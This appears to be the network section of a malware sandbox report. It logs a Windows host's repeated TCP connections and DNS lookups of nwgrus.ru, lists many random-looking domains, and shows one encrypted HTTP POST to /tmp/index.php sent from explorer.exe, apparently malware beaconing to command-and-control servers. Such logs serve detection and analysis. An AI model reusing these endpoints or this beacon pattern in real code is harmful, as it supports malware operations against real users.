                                    Oct 13, 2024 17:04:34.145302057 CEST805003978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:38.177248001 CEST5004080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:38.182682991 CEST805004078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:38.182797909 CEST5004080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:38.182934999 CEST5004080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:38.182967901 CEST5004080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:38.187859058 CEST805004078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:38.187906027 CEST805004078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:39.391208887 CEST805004078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:39.391261101 CEST805004078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:39.391352892 CEST5004080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:39.391530037 CEST5004080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:39.396564007 CEST805004078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:43.318149090 CEST5004180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:43.323273897 CEST805004178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:43.323587894 CEST5004180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:43.323587894 CEST5004180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:43.326654911 CEST5004180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:43.328644991 CEST805004178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:43.331577063 CEST805004178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:44.509438038 CEST805004178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:44.509701014 CEST805004178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:44.509897947 CEST5004180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:44.509897947 CEST5004180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:44.515180111 CEST805004178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:48.781563044 CEST5004280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:48.786787033 CEST805004278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:48.786886930 CEST5004280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:48.787045002 CEST5004280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:48.787079096 CEST5004280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:48.791924953 CEST805004278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:48.792181015 CEST805004278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:50.069689035 CEST805004278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:50.069770098 CEST805004278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:50.069868088 CEST5004280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:50.070045948 CEST5004280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:50.075010061 CEST805004278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:54.547180891 CEST5004380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:54.553078890 CEST805004378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:54.553184986 CEST5004380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:54.553349972 CEST5004380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:54.553381920 CEST5004380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:54.558430910 CEST805004378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:54.558443069 CEST805004378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:55.759946108 CEST805004378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:55.759998083 CEST805004378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:04:55.760103941 CEST5004380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:55.760232925 CEST5004380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:04:55.765090942 CEST805004378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:05:00.277189970 CEST5004480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:05:00.282720089 CEST805004478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:05:00.282829046 CEST5004480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:05:00.282948971 CEST5004480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:05:00.282968998 CEST5004480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:05:00.287978888 CEST805004478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:05:00.288203001 CEST805004478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:05:01.475089073 CEST805004478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:05:01.475759029 CEST805004478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:05:01.475817919 CEST5004480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:05:01.478200912 CEST5004480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:05:01.483138084 CEST805004478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:05:06.191832066 CEST5004580192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:06.196970940 CEST8050045109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:06.197058916 CEST5004580192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:06.197248936 CEST5004580192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:06.197290897 CEST5004580192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:06.202508926 CEST8050045109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:06.202537060 CEST8050045109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:06.985910892 CEST8050045109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:06.986984968 CEST8050045109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:06.987166882 CEST5004580192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:06.988662004 CEST5004580192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:06.993597031 CEST8050045109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:10.835773945 CEST5004680192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:10.840984106 CEST8050046109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:10.841243029 CEST5004680192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:10.841243029 CEST5004680192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:10.841335058 CEST5004680192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:10.846546888 CEST8050046109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:10.846924067 CEST8050046109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:11.639252901 CEST8050046109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:11.639487028 CEST8050046109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:11.639705896 CEST5004680192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:11.647552967 CEST5004680192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:11.652762890 CEST8050046109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:15.984630108 CEST5004780192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:15.990159035 CEST8050047109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:15.990240097 CEST5004780192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:15.990360975 CEST5004780192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:15.990394115 CEST5004780192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:15.995266914 CEST8050047109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:15.995516062 CEST8050047109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:16.825057983 CEST8050047109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:16.825107098 CEST8050047109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:16.825134993 CEST8050047109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:16.825284958 CEST5004780192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:16.825285912 CEST5004780192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:16.825385094 CEST5004780192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:16.830280066 CEST8050047109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:21.862819910 CEST5004880192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:21.867942095 CEST8050048109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:21.868038893 CEST5004880192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:21.868154049 CEST5004880192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:21.868169069 CEST5004880192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:21.873539925 CEST8050048109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:21.873651981 CEST8050048109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:23.062016010 CEST8050048109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:23.062063932 CEST8050048109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:23.062093019 CEST8050048109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:23.062119961 CEST8050048109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:23.062242031 CEST5004880192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:23.062242985 CEST5004880192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:23.062242985 CEST5004880192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:23.062374115 CEST5004880192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:23.068356037 CEST8050048109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:27.906042099 CEST5004980192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:27.911626101 CEST8050049109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:27.911860943 CEST5004980192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:27.911989927 CEST5004980192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:27.911989927 CEST5004980192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:27.916857958 CEST8050049109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:27.916979074 CEST8050049109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:28.722807884 CEST8050049109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:28.723186970 CEST8050049109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:28.723372936 CEST5004980192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:28.723373890 CEST5004980192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:28.729046106 CEST8050049109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:33.735925913 CEST5005080192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:33.741894007 CEST8050050109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:33.742140055 CEST5005080192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:33.742224932 CEST5005080192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:33.742224932 CEST5005080192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:33.747045994 CEST8050050109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:33.747529030 CEST8050050109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:34.538161993 CEST8050050109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:34.539958000 CEST8050050109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:34.540143967 CEST5005080192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:34.540144920 CEST5005080192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:34.545373917 CEST8050050109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:39.538078070 CEST5005180192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:39.543400049 CEST8050051109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:39.543508053 CEST5005180192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:39.543642998 CEST5005180192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:39.543716908 CEST5005180192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:39.548437119 CEST8050051109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:39.548661947 CEST8050051109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:40.582794905 CEST8050051109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:40.582844019 CEST8050051109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:40.582873106 CEST8050051109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:40.583025932 CEST5005180192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:40.583025932 CEST5005180192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:40.583025932 CEST5005180192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:40.587959051 CEST8050051109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:45.094003916 CEST5005280192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:45.099169970 CEST8050052109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:45.099252939 CEST5005280192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:45.099385977 CEST5005280192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:45.099427938 CEST5005280192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:45.104536057 CEST8050052109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:45.104568958 CEST8050052109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:45.894088030 CEST8050052109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:45.894177914 CEST8050052109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:45.894238949 CEST5005280192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:45.898165941 CEST5005280192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:45.903048992 CEST8050052109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:49.931529999 CEST5005380192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:49.936806917 CEST8050053109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:49.937036037 CEST5005380192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:49.937036037 CEST5005380192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:49.937036037 CEST5005380192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:49.942228079 CEST8050053109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:49.942256927 CEST8050053109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:50.726022005 CEST8050053109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:50.727740049 CEST8050053109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:50.727890968 CEST5005380192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:50.727978945 CEST5005380192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:50.733088970 CEST8050053109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:55.265965939 CEST5005480192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:55.284661055 CEST8050054109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:55.284992933 CEST5005480192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:55.284992933 CEST5005480192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:55.284993887 CEST5005480192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:55.289963961 CEST8050054109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:55.290066004 CEST8050054109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:56.081058025 CEST8050054109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:56.081747055 CEST8050054109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:05:56.082118988 CEST5005480192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:56.082118988 CEST5005480192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:05:56.087374926 CEST8050054109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:06:00.378408909 CEST5005580192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:06:00.384020090 CEST8050055109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:06:00.384150028 CEST5005580192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:06:00.384315014 CEST5005580192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:06:00.384349108 CEST5005580192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:06:00.389223099 CEST8050055109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:06:00.389451981 CEST8050055109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:06:01.187680006 CEST8050055109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:06:01.188643932 CEST8050055109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:06:01.188740969 CEST5005580192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:06:01.188834906 CEST5005580192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:06:01.193869114 CEST8050055109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:06:05.958173990 CEST5005680192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:06:05.963494062 CEST8050056109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:06:05.963730097 CEST5005680192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:06:05.963869095 CEST5005680192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:06:05.963869095 CEST5005680192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:06:05.968836069 CEST8050056109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:06:05.969316959 CEST8050056109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:06:06.773713112 CEST8050056109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:06:06.774359941 CEST8050056109.175.29.39192.168.2.4
                                    Oct 13, 2024 17:06:06.774445057 CEST5005680192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:06:06.774727106 CEST5005680192.168.2.4109.175.29.39
                                    Oct 13, 2024 17:06:06.779587984 CEST8050056109.175.29.39192.168.2.4
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 13, 2024 17:02:29.738940001 CEST6297653192.168.2.41.1.1.1
                                    Oct 13, 2024 17:02:30.743540049 CEST6297653192.168.2.41.1.1.1
                                    Oct 13, 2024 17:02:31.743417978 CEST6297653192.168.2.41.1.1.1
                                    Oct 13, 2024 17:02:32.048778057 CEST53629761.1.1.1192.168.2.4
                                    Oct 13, 2024 17:02:32.048799038 CEST53629761.1.1.1192.168.2.4
                                    Oct 13, 2024 17:02:32.048810959 CEST53629761.1.1.1192.168.2.4
                                    Oct 13, 2024 17:05:06.014777899 CEST6184253192.168.2.41.1.1.1
                                    Oct 13, 2024 17:05:06.190921068 CEST53618421.1.1.1192.168.2.4
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Oct 13, 2024 17:02:29.738940001 CEST192.168.2.41.1.1.10x6814Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:30.743540049 CEST192.168.2.41.1.1.10x6814Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:31.743417978 CEST192.168.2.41.1.1.10x6814Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:05:06.014777899 CEST192.168.2.41.1.1.10xe812Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Oct 13, 2024 17:02:32.048778057 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048778057 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048778057 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru197.164.156.210A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048778057 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru189.195.132.134A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048778057 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru201.103.8.135A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048778057 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru190.98.23.157A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048778057 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048778057 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru152.231.127.202A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048778057 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048778057 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048799038 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048799038 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048799038 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru197.164.156.210A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048799038 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru189.195.132.134A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048799038 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru201.103.8.135A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048799038 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru190.98.23.157A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048799038 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048799038 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru152.231.127.202A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048799038 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048799038 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048810959 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048810959 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048810959 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru197.164.156.210A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048810959 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru189.195.132.134A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048810959 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru201.103.8.135A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048810959 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru190.98.23.157A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048810959 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048810959 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru152.231.127.202A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048810959 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:02:32.048810959 CEST1.1.1.1192.168.2.40x6814No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:05:06.190921068 CEST1.1.1.1192.168.2.40xe812No error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:05:06.190921068 CEST1.1.1.1192.168.2.40xe812No error (0)nwgrus.ru152.231.127.202A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:05:06.190921068 CEST1.1.1.1192.168.2.40xe812No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:05:06.190921068 CEST1.1.1.1192.168.2.40xe812No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:05:06.190921068 CEST1.1.1.1192.168.2.40xe812No error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:05:06.190921068 CEST1.1.1.1192.168.2.40xe812No error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:05:06.190921068 CEST1.1.1.1192.168.2.40xe812No error (0)nwgrus.ru197.164.156.210A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:05:06.190921068 CEST1.1.1.1192.168.2.40xe812No error (0)nwgrus.ru189.195.132.134A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:05:06.190921068 CEST1.1.1.1192.168.2.40xe812No error (0)nwgrus.ru201.103.8.135A (IP address)IN (0x0001)false
                                    Oct 13, 2024 17:05:06.190921068 CEST1.1.1.1192.168.2.40xe812No error (0)nwgrus.ru190.98.23.157A (IP address)IN (0x0001)false
                                    • procusohdnplkcl.com
                                      • nwgrus.ru
                                    • yagmckrhrxidkkt.net
                                    • dricwaygwumvuqyx.net
                                    • dvywoyvbihbnwwjn.org
                                    • mbmyqakevfccgv.net
                                    • clrhahncwuyc.com
                                    • fxjvbidmvidvfvuu.org
                                    • qfasgfhewcyw.com
                                    • ajnjimgspja.com
                                    • orfuocjxhujvp.net
                                    • sukwfdfgeltdloqp.org
                                    • cspwoprndoye.com
                                    • qtrqfgpakuyxgovn.org
                                    • cmqaenxsxeyowd.net
                                    • rpyskssnoppwv.net
                                    • uspdxnihexd.org
                                    • fljiwnmgncpvmdu.org
                                    • hbbbwgrmtjdu.net
                                    • yhuliplstnjp.com
                                    • hiodckefgdl.com
                                    • cttvtshacog.org
                                    • baalviblkbjsp.net
                                    • gwngaiusekur.net
                                    • mxjrhmxwrwqyxs.net
                                    • fcwffmgjsqp.org
                                    • vthbbsgwufn.com
                                    • xohyaostsydxib.net
                                    • wbpwgsalvbneixte.net
                                    • pbysepknkik.net
                                    • ijtbudkgjdatnpve.com
                                    • rjwxfpemkdjwjc.net
                                    • hnrmgadlbbkwfam.com
                                    • wdfbqkdpkrjmiy.com
                                    • atckbbeeuxiymh.com
                                    • cijofmhyocrj.org
                                    • mvcnjjhpwrjug.org
                                    • gjrfgywovwumgreo.com
                                    • duklicrioxv.net
                                    • ukjjgoqtxsrmcmnl.net
                                    • kevwooyenkvj.org
                                    • kyqpufsslxgu.com
                                    • gtfiwdiocoxv.com
                                    • wtloyxdgfedr.org
                                    • jrasjcgaikr.com
                                    • wqumsknhwrx.net
                                    • uqdrqkhpcmcglann.net
                                    • qxdbxtuaolo.net
                                    • nobwwkshognvggkp.net
                                    • gafhlilcplomq.com
                                    • mwqmbajulrg.com
                                    • wtfbpeudtpjocvd.com
                                    • lkewxsecdko.org
                                    • sxnddulhpoyubn.com
                                    • suevwuleoceiaguq.com
                                    • dyetfqbcutdwehk.org
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.44973678.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:02:32.576184988 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://procusohdnplkcl.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 267
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:02:32.576219082 CEST267OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 04 a3 fd
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu#9]RzU'jdf6g|X5f_|C^% ?#@JW"76+=8[@y9O:[gyguRo`HJSWS!
                                    Oct 13, 2024 17:02:34.009001017 CEST152INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:02:33 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 04 00 00 00 72 e8 87 e9
                                    Data Ascii: r


